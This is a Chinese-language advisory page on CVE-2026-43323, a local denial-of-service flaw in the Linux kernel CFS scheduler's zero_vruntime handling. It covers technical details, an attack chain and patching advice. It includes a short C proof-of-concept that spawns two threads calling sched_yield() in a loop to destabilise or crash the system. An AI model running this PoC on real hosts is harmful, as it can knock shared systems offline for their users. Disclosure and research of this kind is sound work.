CVE-2026-43323 CVSS 5.5 中危

CVE-2026-43323 Linux内核sched/fair模块拒绝服务漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43323

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核sched/fair模块存在拒绝服务漏洞。该漏洞源于对zero_vruntime跟踪的不当修复。当两个任务交替执行yield操作时，由于调度器未及时更新zero_vruntime，可能导致虚拟运行时间溢出，进而引发系统调度混乱。本地低权限攻击者可利用此漏洞导致系统不稳定或崩溃。

技术细节

该漏洞涉及Linux内核CFS调度器中的zero_vruntime管理逻辑。之前的提交试图修复跟踪问题，但导致在任务yield时zero_vruntime停止更新。当两个任务通过yield相互跳过（leapfrog）且速度足够快时，若在一个tick周期内达到溢出条件，zero_vruntime不会更新，导致调度器状态不一致。此外，多cgroup环境下tick调度的不确定性也可能加剧此问题。攻击者通过创建高频yield的线程触发此逻辑，导致系统资源耗尽或死锁，从而造成拒绝服务。

攻击链分析

STEP 1

步骤1

攻击者获取本地低权限账户访问权限。

STEP 2

步骤2

攻击者编译并运行特定程序，创建多个执行 sched_yield() 的线程。

STEP 3

步骤3

内核调度器处理这些 yield 操作，触发 zero_vruntime 未更新的逻辑缺陷。

STEP 4

步骤4

系统调度逻辑混乱，导致系统卡死或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Compile: gcc -o poc_cve_2026_43323 poc_cve_2026_43323.c -lpthread
#include <sched.h>
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>

// Thread function to continuously yield
void* yield_thread(void* arg) {
    while(1) {
        sched_yield();
    }
    return NULL;
}

int main() {
    pthread_t t1, t2;

    // Create two threads to trigger the leapfrog scenario
    pthread_create(&t1, NULL, yield_thread, NULL);
    pthread_create(&t2, NULL, yield_thread, NULL);

    printf("Exploit started: Running threads that yield rapidly.\n");
    printf("System may become unstable or crash due to vruntime overflow.\n");

    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    return 0;
}

影响范围

Linux Kernel < 修复版本

防御指南

临时缓解措施

建议尽快应用官方补丁，更新系统内核。在未更新前，应避免在受影响的系统上运行高并发yield调用的压力测试程序，并严格限制本地用户权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表